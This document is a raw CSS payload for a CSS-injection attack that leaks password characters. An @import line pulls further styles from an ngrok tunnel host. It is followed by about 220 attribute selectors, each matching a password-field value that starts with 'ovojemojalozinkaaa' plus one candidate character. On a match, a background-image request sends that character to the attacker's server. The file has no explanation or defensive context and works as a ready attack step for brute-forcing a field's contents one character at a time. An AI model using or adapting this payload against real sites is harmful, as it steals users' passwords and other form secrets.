@import url("http://bc0a37bcf1d5.ngrok.io/?l=20");
input[value="ovojemojalozinkaaa!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.1407760826994091");}
input[value="ovojemojalozinkaaa\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.7965905734097625");}
input[value="ovojemojalozinkaaa#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.07575445083611942");}
input[value="ovojemojalozinkaaa$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.12727324718946953");}
input[value="ovojemojalozinkaaa%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.33132597581529466");}
input[value="ovojemojalozinkaaa&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.16302071763684634");}
input[value="ovojemojalozinkaaa'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.35477666786206363");}
input[value="ovojemojalozinkaaa("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.7274003585193798");}
input[value="ovojemojalozinkaaa)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.3120749094297919");}
input[value="ovojemojalozinkaaa*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.08399587970227507");}
input[value="ovojemojalozinkaaa+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.47494055742724073");}
input[value="ovojemojalozinkaaa,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.02013687788119345");}
input[value="ovojemojalozinkaaa-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.015802692649570682");}
input[value="ovojemojalozinkaaa."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.9184665781477075");}
input[value="ovojemojalozinkaaa/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.07233797976904732");}
input[value="ovojemojalozinkaaa0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.49280804138365464");}
input[value="ovojemojalozinkaaa1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.12204793340107489");}
input[value="ovojemojalozinkaaa2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.06692544085866614");}
input[value="ovojemojalozinkaaa3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.6954915820186396");}
input[value="ovojemojalozinkaaa4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.31893040985571863");}
input[value="ovojemojalozinkaaa5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.25353936862929305");}
input[value="ovojemojalozinkaaa6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.981106395350549");}
input[value="ovojemojalozinkaaa7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.9841820906531751");}
input[value="ovojemojalozinkaaa8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.9331080978372874");}
input[value="ovojemojalozinkaaa9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.67529323720922");}
input[value="ovojemojalozinkaaa:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.630859252144806");}
input[value="ovojemojalozinkaaa;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.6053938726457668");}
input[value="ovojemojalozinkaaa<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.4120087079887642");}
input[value="ovojemojalozinkaaa="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.03596910720899338");}
input[value="ovojemojalozinkaaa>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.8161508800998838");}
input[value="ovojemojalozinkaaa?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.31412964545847943");}
input[value="ovojemojalozinkaaa@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.9098296272372675");}
input[value="ovojemojalozinkaaaA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.0007200594895575563");}
input[value="ovojemojalozinkaaaB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.9344473103381237");}
input[value="ovojemojalozinkaaaC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.11729396658299462");}
input[value="ovojemojalozinkaaaD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.3452802823341643");}
input[value="ovojemojalozinkaaaE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.12901367786720574");}
input[value="ovojemojalozinkaaaF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.7765414557747763");}
input[value="ovojemojalozinkaaaG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.49412669435024226");}
input[value="ovojemojalozinkaaaH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.24065929468378688");}
input[value="ovojemojalozinkaaaI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.7464966782958031");}
input[value="ovojemojalozinkaaaJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.3531083027854309");}
input[value="ovojemojalozinkaaaK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.37506071068340563");}
input[value="ovojemojalozinkaaaL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.5437863158455007");}
input[value="ovojemojalozinkaaaM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.9981674981920039");}
input[value="ovojemojalozinkaaaN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.16116503932465998");}
input[value="ovojemojalozinkaaaO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.17795813343726996");}
input[value="ovojemojalozinkaaaP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.336839998190271");}
input[value="ovojemojalozinkaaaQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.09012448033153908");}
input[value="ovojemojalozinkaaaR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.04105285154325289");}
input[value="ovojemojalozinkaaaS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.5783547923327115");}
input[value="ovojemojalozinkaaaT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.7051143881311328");}
input[value="ovojemojalozinkaaaU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.003172173805849221");}
input[value="ovojemojalozinkaaaV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.6213616491807983");}
input[value="ovojemojalozinkaaaW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.20230690982921407");}
input[value="ovojemojalozinkaaaX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.1297639066941092");}
input[value="ovojemojalozinkaaaY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.03005065017715003");}
input[value="ovojemojalozinkaaaZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.5141357903201937");}
input[value="ovojemojalozinkaaa["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.6120373155118577");}
input[value="ovojemojalozinkaaa\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.5717160151896021");}
input[value="ovojemojalozinkaaa]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.7749663682300871");}
input[value="ovojemojalozinkaaa^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.1270864093844466");}
input[value="ovojemojalozinkaaa_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.8292812732853059");}
input[value="ovojemojalozinkaaa`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.8081994916787247");}
input[value="ovojemojalozinkaaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.4757564659302784");}
input[value="ovojemojalozinkaaab"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.22134224046014883");}
input[value="ovojemojalozinkaaac"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.11832816591518913");}
input[value="ovojemojalozinkaaad"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.37806755388723245");}
input[value="ovojemojalozinkaaae"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.7993951391560075");}
input[value="ovojemojalozinkaaaf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.24304469602762624");}
input[value="ovojemojalozinkaaag"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.783720770657858");}
input[value="ovojemojalozinkaaah"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.6265514997618564");}
input[value="ovojemojalozinkaaai"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.0836397438158849");}
input[value="ovojemojalozinkaaaj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.013112343865063547");}
input[value="ovojemojalozinkaaak"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.09076796238652807");}
input[value="ovojemojalozinkaaal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.03519807027999655");}
input[value="ovojemojalozinkaaam"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.9716478322243032");}
input[value="ovojemojalozinkaaan"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.8245772149914758");}
input[value="ovojemojalozinkaaao"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.6086436782183569");}
input[value="ovojemojalozinkaaap"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.29600628943629204");}
input[value="ovojemojalozinkaaaq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.31457902798601034");}
input[value="ovojemojalozinkaaar"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.34334913738880823");}
input[value="ovojemojalozinkaaas"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.18802674855181944");}
input[value="ovojemojalozinkaaat"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.31209390601257336");}
input[value="ovojemojalozinkaaau"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.34142865912502307");}
input[value="ovojemojalozinkaaav"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.7227062768120271");}
input[value="ovojemojalozinkaaaw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.2476591567602282");}
input[value="ovojemojalozinkaaax"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.23266909246865408");}
input[value="ovojemojalozinkaaay"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.7213637529121786");}
input[value="ovojemojalozinkaaaz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.5664350906220614");}
input[value="ovojemojalozinkaaa{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.9379783770823844");}
input[value="ovojemojalozinkaaa|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.7421948768706108");}
input[value="ovojemojalozinkaaa}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.818850874639357");}
input[value="ovojemojalozinkaaa~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.2988180239503566");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9796783332983292");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8779641200834025");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.39151102685194816");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4387016063179221");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7401114920438492");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8187738035314693");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5127863186735981");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6265869206118548");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7088619073386879");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.010846635536272409");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6170203314641183");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1917912600053071");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3926161303643845");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.31970633222989586");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7163737673841475");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6273733700722264");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3035524373991132");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06625442247358038");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.22057706341244154");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6291321045328717");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9659623151766517");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11263121515702257");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6296534405895424");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7904539347245148");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.34138647196521266");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5813453173734611");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09186962476741223");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4862903541581496");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9411094816490304");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8065732441143887");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4838166075191179");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.404088054803206");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.26104615233772277");}
input[value="ovojemojalozinkaaa "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.39182734114940265");}
input[value="ovojemojalozinkaaa¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.7145365122625433");}
input[value="ovojemojalozinkaaa¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.9029601303547672");}
input[value="ovojemojalozinkaaa£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.15653801312720916");}
input[value="ovojemojalozinkaaa¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.13305549320396493");}
input[value="ovojemojalozinkaaa¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.9848811621292521");}
input[value="ovojemojalozinkaaa¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.1121275060190019");}
input[value="ovojemojalozinkaaa§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.273533950222409");}
input[value="ovojemojalozinkaaa¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.44348135905558506");}
input[value="ovojemojalozinkaaa©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.31245114963975773");}
input[value="ovojemojalozinkaaaª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.21800507827492366");}
input[value="ovojemojalozinkaaa«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.4560058723459648");}
input[value="ovojemojalozinkaaa¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.08771564247620423");}
input[value="ovojemojalozinkaaa­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.08424704335170241");}
input[value="ovojemojalozinkaaa®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.1269538529069656");}
input[value="ovojemojalozinkaaa¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.46093733268719417");}
input[value="ovojemojalozinkaaa°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.34003806424473626");}
input[value="ovojemojalozinkaaa±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.6653374021468983");}
input[value="ovojemojalozinkaaa²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.8476236490970241");}
input[value="ovojemojalozinkaaa³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.18376243178638596");}
input[value="ovojemojalozinkaaa´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.3184707199982728");}
input[value="ovojemojalozinkaaaµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.6299260274942344");}
input[value="ovojemojalozinkaaa¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.22719751273568822");}
input[value="ovojemojalozinkaaa·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.6644801006475638");}
input[value="ovojemojalozinkaaa¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.5282523611383445");}
input[value="ovojemojalozinkaaa¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.432348302325509");}
input[value="ovojemojalozinkaaaº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.8976049396445034");}
input[value="ovojemojalozinkaaa»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.5199447932614178");}
input[value="ovojemojalozinkaaa¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.5341637310229552");}
input[value="ovojemojalozinkaaa½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.1776432893685691");}
input[value="ovojemojalozinkaaa¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.9746917941415985");}
input[value="ovojemojalozinkaaa¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.46413783339672166");}
input[value="ovojemojalozinkaaaÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.6086512679842753");}
input[value="ovojemojalozinkaaaÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.28144249888190154");}
input[value="ovojemojalozinkaaaÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.5615593054920058");}
input[value="ovojemojalozinkaaaÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.042614131415068535");}
input[value="ovojemojalozinkaaaÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.33237458548772847");}
input[value="ovojemojalozinkaaaÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.00039180310724162837");}
input[value="ovojemojalozinkaaaÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.019372660675377018");}
input[value="ovojemojalozinkaaaÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.47610038865719995");}
input[value="ovojemojalozinkaaaÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.16342707941627332");}
input[value="ovojemojalozinkaaaÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.9254981404282194");}
input[value="ovojemojalozinkaaaÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.941310413566584");}
input[value="ovojemojalozinkaaaË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.5584836577406012");}
input[value="ovojemojalozinkaaaÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.6219249953293378");}
input[value="ovojemojalozinkaaaÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.6918535955527376");}
input[value="ovojemojalozinkaaaÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.7057340003613806");}
input[value="ovojemojalozinkaaaÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.7452054929722856");}
input[value="ovojemojalozinkaaaÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.009469155713349053");}
input[value="ovojemojalozinkaaaÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.8107719918084733");}
input[value="ovojemojalozinkaaaÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.8827168386935687");}
input[value="ovojemojalozinkaaaÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.8048034803273543");}
input[value="ovojemojalozinkaaaÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.883569228769745");}
input[value="ovojemojalozinkaaaÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.05913364570013169");}
input[value="ovojemojalozinkaaaÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.7182383048142895");}
input[value="ovojemojalozinkaaa×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.15977305469457548");}
input[value="ovojemojalozinkaaaØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.3496040016245321");}
input[value="ovojemojalozinkaaaÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.04988990354895417");}
input[value="ovojemojalozinkaaaÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.22847134373348665");}
input[value="ovojemojalozinkaaaÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.7354357734909616");}
input[value="ovojemojalozinkaaaÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.05753426355643887");}
input[value="ovojemojalozinkaaaÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.9493477484237909");}
input[value="ovojemojalozinkaaaÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.04233788094471391");}
input[value="ovojemojalozinkaaaß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.4637782082637676");}
input[value="ovojemojalozinkaaaà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.876276777602998");}
input[value="ovojemojalozinkaaaá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.7741724435667792");}
input[value="ovojemojalozinkaaaâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.2394353399479905");}
input[value="ovojemojalozinkaaaã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.9839566418955057");}
input[value="ovojemojalozinkaaaä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.4086736651460299");}
input[value="ovojemojalozinkaaaå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.8625865346696322");}
input[value="ovojemojalozinkaaaæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.3797395000591981");}
input[value="ovojemojalozinkaaaç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.4409350054520731");}
input[value="ovojemojalozinkaaaè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5224542050320666");}
input[value="ovojemojalozinkaaaé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.1051477156509022");}
input[value="ovojemojalozinkaaaê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.2022733076871368");}
input[value="ovojemojalozinkaaaë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.026428699063517413");}
input[value="ovojemojalozinkaaaì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.21227820368428563");}
input[value="ovojemojalozinkaaaí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.42339359542723365");}
input[value="ovojemojalozinkaaaî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.40619246014062504");}
input[value="ovojemojalozinkaaaï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.7790939562594168");}
input[value="ovojemojalozinkaaað"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.25642092433412933");}
input[value="ovojemojalozinkaaañ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.4829370968228819");}
input[value="ovojemojalozinkaaaò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.5584919078450648");}
input[value="ovojemojalozinkaaaó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.9518053657506387");}
input[value="ovojemojalozinkaaaô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9256740314728935");}
input[value="ovojemojalozinkaaaõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.2136594395777387");}
input[value="ovojemojalozinkaaaö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.9710731864526703");}
input[value="ovojemojalozinkaaa÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.7994383503119851");}
input[value="ovojemojalozinkaaaø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.07606163821829282");}
input[value="ovojemojalozinkaaaù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.18269743637661962");}
input[value="ovojemojalozinkaaaú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.41006312617984486");}
input[value="ovojemojalozinkaaaû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.736473146327034");}
input[value="ovojemojalozinkaaaü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.14724870666818668");}
input[value="ovojemojalozinkaaaý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.21399780182434958");}
input[value="ovojemojalozinkaaaþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.2973404220964775");}
input[value="ovojemojalozinkaaaÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.40501180947521775");}
